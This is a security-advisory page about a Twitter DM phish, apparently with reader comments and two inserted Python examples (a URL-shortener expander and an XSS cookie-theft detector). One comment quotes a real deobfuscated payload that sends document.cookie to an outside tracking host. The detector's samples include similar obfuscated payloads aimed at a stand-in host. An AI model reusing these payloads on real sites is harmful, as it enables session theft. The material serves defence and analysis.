It's always great to hear from our readers. We just got this note in from Tom on a phish that he recently encountered: "One of my followers on Twitter (whose account was likely hacked or fell victim to this scam) sent me the following DM:" This was just too good an example to pass up writing about. Things to watch out for:
If you've got any other pointers, or if I've missed anything, please use our comment section to ... well ... comment!
Rob VandenBrink, 578 Posts, ISC Handler, May 30th 2012
bit.ly and other URL shortener services have a way to see the hidden address without visiting. Bit.ly used to use an "=" symbol at the end of the URL, but now they have an API for that.
AndrewB, 24 Posts, May 30th 2012
It looks like the JavaScript XSS in the WHOIS record for tvviiter.com is only mildly evil, and not related to the phishers. The record for every site registered by XIN NET seems to include it, and (at least when I request it with wget and TOR) the script just writes out an ad banner image and link for XIN NET's own domain registration service. XIN NET has a reputation for being scummy, but that's still pretty impressive behavior for even a semi-legitimate company.
ElliotK, 1 Post, May 30th 2012
To see what's behind a link created by a URL shortener service, you can use any of the following sites:
http://www.getlinkinfo.com/
http://longurl.org/

bartblaze, 6 Posts, May 30th 2012
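As an added example for the two comments above about seeing where a shortened link goes without visiting it (this is not code from the diary or from any commenter): a small Python resolver that walks the redirect chain with HEAD requests, one hop at a time, so the final page is never fetched. The `head_request` fetcher, the hostnames short.example and sh.example, and the redirect table used in place of the network are all my assumptions.

```python
"""Expand a shortened URL by walking its HTTP redirect chain with HEAD requests.

Added example for this thread, not code from the ISC diary or any commenter.
Assumptions: the `head_request` fetcher and the hostnames short.example and
sh.example are mine; FAKE_REDIRECTS stands in for the network so this runs offline.
"""
import http.client
from urllib.parse import urljoin, urlsplit

REDIRECT_CODES = {301, 302, 303, 307, 308}
MAX_HOPS = 10


def head_request(url, timeout=10):
    """Send one HEAD request and return (status, lower-cased header dict).
    http.client never follows redirects on its own, so nothing past this
    single hop is fetched."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("only http(s) URLs are expanded: %r" % url)
    conn_cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(parts.netloc, timeout=timeout)
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    try:
        conn.request("HEAD", path, headers={"User-Agent": "url-expander/0.1"})
        resp = conn.getresponse()
        return resp.status, {k.lower(): v for k, v in resp.getheaders()}
    finally:
        conn.close()


def expand(url, fetch=head_request, max_hops=MAX_HOPS):
    """Return (chain, reason): every URL visited in order, and why we stopped.
    reason is "final" (a non-redirect answer), "loop", "no-location" or
    "too-many-hops". The last chain entry is the hidden destination when
    reason == "final"."""
    chain = [url]
    seen = {url}
    for _ in range(max_hops):
        status, headers = fetch(chain[-1])
        if status not in REDIRECT_CODES:
            return chain, "final"
        location = headers.get("location")
        if not location:
            return chain, "no-location"
        nxt = urljoin(chain[-1], location)  # Location may be relative
        chain.append(nxt)
        if nxt in seen:
            return chain, "loop"
        seen.add(nxt)
    return chain, "too-many-hops"


# Constructed stand-in for the network: a two-hop shortener chain and a loop.
FAKE_REDIRECTS = {
    "http://short.example/abc": (301, {"location": "http://sh.example/xyz"}),
    "http://sh.example/xyz": (302, {"location": "/login"}),   # relative Location
    "http://sh.example/login": (200, {"content-type": "text/html"}),
    "http://short.example/loop1": (302, {"location": "http://short.example/loop2"}),
    "http://short.example/loop2": (302, {"location": "http://short.example/loop1"}),
}


def fake_fetch(url):
    """Offline fetcher that answers from FAKE_REDIRECTS (404 for anything else)."""
    return FAKE_REDIRECTS.get(url, (404, {}))


if __name__ == "__main__":
    for start in ("http://short.example/abc", "http://short.example/loop1"):
        chain, reason = expand(start, fetch=fake_fetch)
        print(reason, " -> ".join(chain))
```

Two caveats worth keeping in mind when running this against real shorteners: some services answer a HEAD differently from a GET (or not at all), and the landing page can still bounce you on with a meta refresh or JavaScript redirect that an HTTP-level walk never sees. The hop limit and loop check are there so a deliberately circular chain cannot keep the resolver busy. Unlike the expander web sites mentioned above, this runs locally, so the URL you are checking is not handed to a third party.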
_If_ you decide to open a suspicious link, I suggest you first log off from all web-based sessions you have open, in particular your webmail if that's how you received the link.

For example, Yahoo users were/are targeted as follows: they receive a mail from someone they know asking them to click on a link such as hxxp://www.news15jo.net/biz/ (other hostnames include www.news15de.net and www.inews15ny.net, many more will probably exist, each of them currently resolving to 190.123.43.180, 77.79.14.249, 77.79.13.19, 193.107.19.215, 190.123.43.85, 193.107.19.185, 190.123.43.85, 50.7.246.171). My source (in Dutch): http://www.security.nl/artikel/41676/1/Gevaarlijke_site_als_url_in_de_mail.html

hxxp://www.news15jo.net/biz/ looks like a news site, however "get rich quick" is all over the place. For anyone who trusts these guys: "How A single Mom from [location obtained from http://j.maxmind.com/app/geoip.js] unlocked a gold mine and is turning huge profits from home." Just Google for (including the double quotes): "How A single Mom from" "unlocked a gold mine and is turning huge profits from home."

In between the calls to various websites the following is interesting (simplified by me):

GET /forumCreation/createNewForum?p=aaaa [followed by obfuscated stuff including, deobfuscated: onmousemove="document.location.href='http://trackuk.net/ru/tracking.php?ex='.concat(escape(document.cookie)) ]
Host: kr.kpost.yahoo.com
Referer: http://www.news15jo.net/biz/toto.php

I've not fully investigated this (didn't see any drive-by malware, but some netizens report otherwise). However I assume that if you're still logged on to Yahoo and you click the link, a thread on the KPost (Korea) forum is created by _you_ followed by some magic that causes you to spam everyone in your Yahoo address list.

PS1 NoScript in Firefox cries XSS.
PS2 Google for "/forumCreation/createNewForum?p=aaaa" (including the double quotes) results in a lot of recent urlquery.net hits.
PS3 Apparently this has been going on for some time now, see http://www.workathometruth.com/herman-cain-email-spam-used-by-scammers-to-push-home-business-scams/
Erik van Straten, 129 Posts, May 30th 2012
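As an added illustration of the kind of payload Erik describes above (a p= parameter carrying an obfuscated onmousemove handler that ships document.cookie off to a tracking host), here is a Python checker that peels simple obfuscation layers off captured request lines and flags cookie exfiltration. This is my example, not the commenter's code and not anything taken from the actual pages: the request lines are constructed, the host tracker.example is hypothetical, and the percent-encoding and String.fromCharCode layers are assumed obfuscation styles, not a claim about what the real payload used.

```python
"""Spot a cookie-stealing XSS payload hidden under simple obfuscation.

Added example for this thread, not code from the ISC diary or any commenter.
The request lines below are constructed, tracker.example is hypothetical, and
the percent-encoding / String.fromCharCode layers are assumed obfuscation styles.
"""
import re
from urllib.parse import unquote

FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
PERCENT_U = re.compile(r"%u([0-9a-fA-F]{4})")          # JS unescape()-style %uXXXX
COOKIE_SOURCE = re.compile(r"document\.cookie")
EXFIL_SINK = re.compile(
    r"(document\.location|location\.href|window\.location|\.src\s*=|XMLHttpRequest|fetch\()"
)
EVENT_HANDLER = re.compile(r"\bon\w+\s*=")


def deobfuscate(text, max_rounds=5):
    """Peel %uXXXX, percent-encoding and String.fromCharCode(...) layers until
    the text stops changing (bounded so a pathological input cannot spin)."""
    for _ in range(max_rounds):
        new = PERCENT_U.sub(lambda m: chr(int(m.group(1), 16)), text)
        new = unquote(new)
        new = FROMCHARCODE.sub(
            lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()),
            new,
        )
        if new == text:
            break
        text = new
    return text


def classify(request_line):
    """Return (verdict, decoded_line). "cookie-exfil" needs both a read of
    document.cookie and a sink that can carry it off-site; a lone source, sink,
    script tag or inline event handler is only "suspicious"."""
    decoded = deobfuscate(request_line)
    has_cookie = bool(COOKIE_SOURCE.search(decoded))
    has_sink = bool(EXFIL_SINK.search(decoded))
    if has_cookie and has_sink:
        return "cookie-exfil", decoded
    if has_cookie or has_sink or "<script" in decoded.lower() or EVENT_HANDLER.search(decoded):
        return "suspicious", decoded
    return "clean", decoded


def scan(lines):
    """Verdict for each captured request line, in order."""
    return [classify(line)[0] for line in lines]


def _to_fromcharcode(js):
    """Helper used only to build the constructed sample: wrap JS in fromCharCode."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in js) + ")"


# Constructed samples: a benign request, the percent-encoded onmousemove payload,
# and the same idea hidden behind String.fromCharCode inside an onload handler.
HIDDEN_JS = "new Image().src='http://tracker.example/t?c='+document.cookie"
SAMPLE_REQUESTS = [
    "GET /forumCreation/createNewForum?p=hello HTTP/1.1",
    "GET /forumCreation/createNewForum?p=aaaa%22%20onmousemove%3D%22document.location.href"
    "%3D%27http%3A%2F%2Ftracker.example%2Ftracking.php%3Fex%3D%27.concat(escape(document.cookie)) HTTP/1.1",
    "GET /forumCreation/createNewForum?p=aaaa%22%20onload%3D%22eval(" + _to_fromcharcode(HIDDEN_JS) + ") HTTP/1.1",
]


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        verdict, decoded = classify(line)
        print(verdict.ljust(13), decoded[:110])
```

Two notes on the defensive side, following Erik's advice to log off first: a cookie flagged HttpOnly is not readable through document.cookie, so the exfil string in this payload would carry nothing useful, but the forged forum-creation request would still ride on the live session. Logging out of the webmail session before clicking kills both the cookie theft and the cross-site request, which is why that advice is worth more than any single cookie flag.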